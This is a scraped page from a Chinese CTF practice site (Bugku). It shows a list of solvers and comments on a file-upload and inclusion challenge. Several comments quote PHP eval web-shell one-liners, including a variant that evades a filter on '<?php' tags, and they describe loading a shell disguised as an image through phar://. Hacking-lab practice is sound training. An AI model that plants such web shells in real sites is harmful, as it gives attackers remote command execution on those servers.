评分(5)
解题动态

海浪geigei 攻破了该题 42分钟前

alfsage 攻破了该题 11小时前

Hehe0619 攻破了该题 21小时前

ww__ 攻破了该题 1天前

a1451753998 攻破了该题 1天前

dahuaaistudy 攻破了该题 1天前

YGLZ 攻破了该题 2天前

zhuizhui 攻破了该题 2天前

人闲桂花落 攻破了该题 3天前

roopelee 攻破了该题 3天前

dwx1583 攻破了该题 3天前

mecurio 攻破了该题 5天前

qidianzhi 攻破了该题 5天前

跃迁ctfer 攻破了该题 6天前

hackerbugku 攻破了该题 6天前

Future92 攻破了该题 7天前

maomaoht 攻破了该题 7天前

aaaaab 攻破了该题 8天前

千机www 攻破了该题 9天前

评论
yes1yi 3年前
举报
有人把flag删掉了?
a2cai 3年前
举报
不是很懂,试过<?php @eval($_POST['shell'])?>放到jpg里,然后上传后包含它,打开F12发现它其实会echo它?但会对一些字符进行转换啥的,我试的<?php和?>会转换成 _ ,然后 < 和 > 分别转换为<!-- 和-->,就不知道为啥用<script language='php'>@eval($_POST[
yswdlll 3年前
举报
phar能把压缩文件解压读取,即使这个压缩文件的后缀名改了也可以。。所以上传一个getshell的压缩文件,后缀名改成jpg或者其他。。然后通过phar://读取
onerm 3年前
举报
学到了
ycfhw1 3年前
举报
flag没被删,只是换了位置而已,这么看的话,还是连菜刀查找效率更高
hoshino 3年前
举报
哥连不上
4thrun 3年前
举报
1. 注意使用php脚本的文件包含,直接访问图片是没用的。这里index.php存在文件包含。 2. <?php ? >被过滤了
Qingwan 2年前
举报
大佬,怎么知道<?php ?>被过滤的捏
guozi 3年前
举报
喜欢有马的同学们,其实可以这样的 <script language="php">@eval($_POST[pass])</script>
Seveen1 4年前
举报
FLAG找得到,但是蚁剑连接上了后是一串乱码的文件,最后我是通过POST的内容直接进行命令执行
现在有点开心了 3年前
举报
哈哈,手动蚁剑
6lack 4年前
举报
bugku这种生成的一次性临时环境咋可能被删flag嘛。。。找不到flag的认真找找吧
丶我亚索贼六 4年前
举报
过滤了<? php ?>
yb980 4年前
举报
还是命令行终端好用!!!!